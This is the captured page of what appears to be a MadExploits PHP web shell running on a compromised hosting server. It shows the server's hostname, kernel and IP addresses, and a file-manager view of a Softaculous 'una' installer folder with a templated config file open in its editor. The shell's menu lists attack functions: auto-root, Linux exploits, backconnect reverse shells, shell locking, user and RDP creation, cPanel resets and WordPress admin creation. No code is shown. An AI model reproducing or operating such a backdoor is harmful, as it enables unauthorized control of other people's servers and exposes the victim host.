Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.138.101.51
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
una /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
6.3
KB
-rw-r--r--
edit.php
4.43
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
634
B
-rw-r--r--
header.inc.php
1.36
KB
-rw-r--r--
import.php
3.01
KB
-rw-r--r--
info.xml
3.88
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.11
KB
-rw-r--r--
install.xml
1.31
KB
-rw-r--r--
md5
6.15
KB
-rw-r--r--
notes.txt
232
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.inc.php
<?php define('BX_DOL', 1); define('BX_DOL_URL_ROOT', '[[softurl]]/'); ///< site url define('BX_DIRECTORY_PATH_ROOT', '[[softpath]]/'); ///< site path define('BX_DATABASE_HOST', '[[softdbhost]]'); ///< db host define('BX_DATABASE_SOCK', ''); ///< db socket define('BX_DATABASE_PORT', ''); ///< db port define('BX_DATABASE_USER', '[[softdbuser]]'); ///< db user define('BX_DATABASE_PASS', '[[softdbpass]]'); ///< db password define('BX_DATABASE_NAME', '[[softdb]]'); ///< db name define('BX_DATABASE_ENGINE', 'MYISAM'); ///< db engine define('BX_SYSTEM_JAVA', 'java:'); ///< path to java binary define('BX_SYSTEM_FFMPEG', '[[softpath]]/plugins/ffmpeg/ffmpeg.exe'); ///< path to ffmpeg binary define('BX_DOL_SECRET', '[[secret]]'); ///< secret word define('BX_DB_FULL_VISUAL_PROCESSING', true); ///< upon db error - show error message define('BX_DB_FULL_DEBUG_MODE', false); ///< upon db error - show detailed report (turn off in production mode) define('BX_DB_DO_EMAIL_ERROR_REPORT', true); ///< upon db error - send email with detailed report error_reporting(E_ALL); mb_internal_encoding('UTF-8'); mb_regex_encoding('UTF-8'); date_default_timezone_set('UTC'); require_once('params.inc.php'); bx_check_debug_mode(); bx_check_maintenance_mode(true); bx_check_minimal_requirements(true); bx_check_redirect_to_correct_hostname(true); bx_check_redirect_to_remove_install_folder(true);
Close